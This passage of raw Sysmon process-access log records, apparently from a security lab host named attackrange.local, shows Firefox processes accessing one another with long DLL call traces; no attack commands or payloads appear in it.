Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.529{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.529{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program 
Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.373{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla 
Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.373{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.373{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla 
Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.202{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla 
Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.202{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 
10341000x800000000000000018473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.202{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:21.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla 
Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:21.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla 
Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:21.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.967{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000018501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.967{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla 
Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000018500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.967{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla 
Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000018499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.390{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.390{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.390{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla 
